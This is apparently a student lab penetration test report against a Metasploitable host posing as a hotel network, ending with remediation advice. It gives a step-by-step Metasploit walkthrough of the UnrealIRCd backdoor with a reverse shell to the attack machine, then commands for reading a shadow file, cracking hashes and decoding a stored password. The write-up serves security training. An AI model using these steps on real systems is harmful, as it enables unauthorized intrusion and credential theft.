Penetration Test Demo

Shyani Turnbull Shyani Turnbull

Penetration Test Report

Pen Test Report

Introduction

At the request of Hotel Dorsey’s upper-level management, our team at Haverbrook Security Lab performed a full penetration test of the network. This was characterized by the salience of providing a practical application to foreground the severity of vulnerabilities and their potential impact on the establishment’s reputation and revenue. The aim was to demonstrate how attackers might be able to infiltrate the network and access sensitive information, such as credentials, by using these weaknesses as entrances. With that said, it was explicitly stated that the scope of the test should be guided by adherence to industry standards. Permission was given to exploit a specific vulnerability to engender credential harvesting and data exfiltration on the target Metasploitable machine, i.e., Hotel Dorsey’s system, using an attack machine, which in this case was Kali Linux. Kali is an operating system tailored to meet the needs of penetration testing, digital forensics, and other associated procedures. As a result, it is equipped with tools vital to this particular penetration test, including Zenmap, Metasploit, and John the Ripper. Zenmap is the graphical user interface of Nmap, a port scanner used for the enumeration of services and host discovery. Metasploit is a pentesting framework employed to assess vulnerabilities and carry out exploits, and John the Ripper is a tool that facilitates password cracking. [11]

To further ensure that testing remained within the parameters of the scope, every step of the process was thoroughly documented. Screenshots were taken with timestamps and dates included to show how connectivity was established between the attack machine and the victim. Additionally, only the two approved IP addresses of each system were utilized, and only the target port 6667 and the listener port 4444 were used to gain remote access to the target. All these methods worked to accomplish the exploitation of the victim according to the scope. Consequently, in its entirety, this oeuvre will provide a detailed analysis as it relates to what was tested, what was used to do the testing, what was uncovered, as well as how to possibly remediate the risks found to prevent exploitation.

Target

Regarding the target of the exploit, its hostname is umgc-metasploitable, and its IP address is 10.7.5.100. This knowledge enabled a connection with the attack machine, kali-umgc, with the IP address 10.7.5.50. Noting these addresses is necessary since it underscores the scope, highlights the points of entry, validates the penetration test, and supports audit compliance. This provides clarity as to the source of the artifacts to be harvested and exfiltrated. To probe the host for open ports or entry points through which attackers might enter, Zenmap was implemented. Upon scanning for open ports, the following ports were found:

Figure 1: Aggressive Zenmap Scan

After considering the extent to which the vulnerabilities found on each port in the System Scan Report may affect Hotel Dorsey’s stock prices and public image, it is recommended that additional staff be hired, specifically a network engineer and a database administrator. Despite the competitive salaries and benefits that the company would have to offer these professionals, the investment is worth it because of the expertise they would bring, thereby minimizing security risks that would persist otherwise. A database administrator (DBA) is typically in charge of verifying accurate data storage and retrieval, in addition to being concerned with database maintenance, security, and operation. [4] On the other hand, a network engineer designs and builds networks, actively seeks to enhance infrastructure, and keeps track of network performance to remedy any issues that may arise. [2]

Vulnerability

The urgent call for industry experts has gone beyond the bounds of theoretical misconfigurations, code injection, denial of service, and cross-site scripting vulnerabilities, among others that were previously revealed. These weaknesses are real-life threats that require immediate attention.  To embrace a pragmatic approach, I consensually exploited Hotel Dorsey’s network using a vulnerability detected on port 6667, which uses the version UnrealIRCd, an IRC daemon (background process). According to CVE-2010-2075, some mirror sites on systems that use the version UnrealIRCd 3.2.8.1, issued between November 2009 and June 2010, were remotely replaced with a backdoor Trojan Horse that was camouflaged as a log/debug macro called DEBUG3_DOLOG_SYSTEM. [10] In reality, it was a malicious system() call inserted into the source code. [9] It allows a remote attacker to bypass authentication, avoid detection, and gain the privileges of the user running the ircd service. [7] In essence, they become capable of executing arbitrary commands.

To exploit the system using this vulnerability, I started by running Metasploit. From there, I searched for exploits for port 6667 using the command search UnrealIRCd. I then copied the exploit I found and typed use exploit/unix/irc/unreal_ircd_3281_backdoor. Following that, I set the RHOST, which is the IP address of the target machine, by entering set RHOST 10.7.5.100, after which I checked the options given using the command show options to verify that the target port was 6667 and the RHOST configuration was successful. Proceeding this, I set the payload, which is the code that is employed after an exploit is able to execute code to perform tasks. I did that by running set PAYLOAD cmd/unix/reverse. After this, I set the LHOST, the attack machine’s IP used to create a reverse shell connection with the victim, by using set LHOST 10.7.5.50. I ran show options again and saw that everything was applied accordingly, including the LPORT 4444, which is the port on the attack machine where the IRC service accepted incoming traffic. Lastly, I ran the exploit command and opened a session to run commands and obtain the target’s assets.

Data Exfiltration

In terms of data exfiltration, it is defined as the act of unobtrusively and strategically stealing data. [8] This process is only possible if a data breach or leak takes place, as was shown with the use of the UnrealIRCd backdoor, and yet not all breaches or leaks result in exfiltration. [8] To harvest credentials and exfiltrate data from the company’s network, I executed a series of commands in the following order:

  1. ls / : To view all the directories

  2. cd /redteamlookhere: To change to this directory

  3. ls: To view its contents

  4. cat shadow: To show the contents of shadow. The /redteamlookhere directory contained shadow, which presented a plethora of hashes, including redteam7student5, which was the intended string.

  5. leafpad hash7_5.txt: In another terminal window, this was used to create a file with the mentioned name to store the hash for redteam7student5 after copying it.

  6. john hash7_5.txt: To use the John the Ripper tool to crack the hash in the hash7_5.txt file. After completion, the password of  redteam7student5 was shown to be “t3”

  7. cat .john/john.pot: To show all the hashes that were cracked

  8. ls /: To view the directories again

  9. cd /redteam7: To change to this specific directory

  10. ls: To list its contents

  11. cd /redteam7/student5: The /redteam7 directory housed a few constituents like student5. So, this command was used to change to that directory.

  12. ls: Presents a sensitive file called mypass.txt

  13. cat mypass.txt: To view what it contains. It displayed a base64 string that appeared interesting.

  14.  leafpad string7_5.txt: To  create a file by that name to save the copied string and steal it from the network

  15. base64 -d string7_5.txt: To decrypt the string and access the password, which was “redteam7student5”

Figure 2: Password Cracking and Data Exfiltration Methods

All the passwords were stolen from the network and decrypted with alarming ease. This emphasizes the magnitude of the repercussions the organization will incur if a threat actor manages to exploit the existing vulnerabilities at any given time. Specifically, proprietary data loss may cost the company many setbacks outside of finance. Proprietary data relates to, but is not limited to, Hotel Dorsey’s confidential marketing strategies, client lists, trade secrets, product development, schematics, and computer programs. [1] The exfiltration and exposure of this data may attract more attackers to take advantage of the exfiltrated data, give rise to regulatory fines due to failure to uphold data protection laws, cause competitors to gain an edge through corporate espionage or otherwise, and prompt reputation erosion with consumers and partners choosing to do business with “safer” companies. [6] Furthermore, remediation may lead to a profusion of fees resulting from potential lawsuits, expensive legal battles to safeguard leaked intellectual property, in addition to revenue depletion from operational disruptions that may last up to several months or years. [6] 


Recommendations

Concerning recommendations for the backdoor vulnerability on port 6667, it is crucial that the affected UnrealIRCd 3.2.8.1 version is uninstalled, followed by killing all active ircd sessions, and checking for any remaining backdoor activity. [3] The next step would be to install the latest version from a trusted source. Moreover, if the port is not being used, it is suggested that it be closed to eradicate an unnecessary entry point. Also, since the credentials were easily found, use stronger passwords, such as passphrases, and store them in a more secure location, with access policies in place to enforce periodic changes.


To improve the company's overall security posture, it is crucial to adopt best practices to prevent problems before they arise. Therefore, security audits should be performed regularly, awareness training should be deployed for all employees, intrusion detection and prevention systems (IDPSs) and antimalware should be employed, and firewalls need to be added to block incoming threats. [7] Additionally, other measures include hardening system security by implementing identity and access management (IAM) systems that include role-based access control (RBAC) and multi-factor authentication (MFA). [8] On top of that, it is necessary to ensure patch management, remove inessential software, close other unneeded services, perform consistent log and traffic monitoring, and make use of data loss prevention (DLP) tools to impede data exfiltration attempts. [8] Finally, considering all the threats at play, it is imperative that a well-defined incident response plan is developed in the event a breach occurs. [6] With these tactics in place, the management of Hotel Dorsey will be on their way to showcasing that they value their security, and that of their customers and shareholders.

 

References

Read More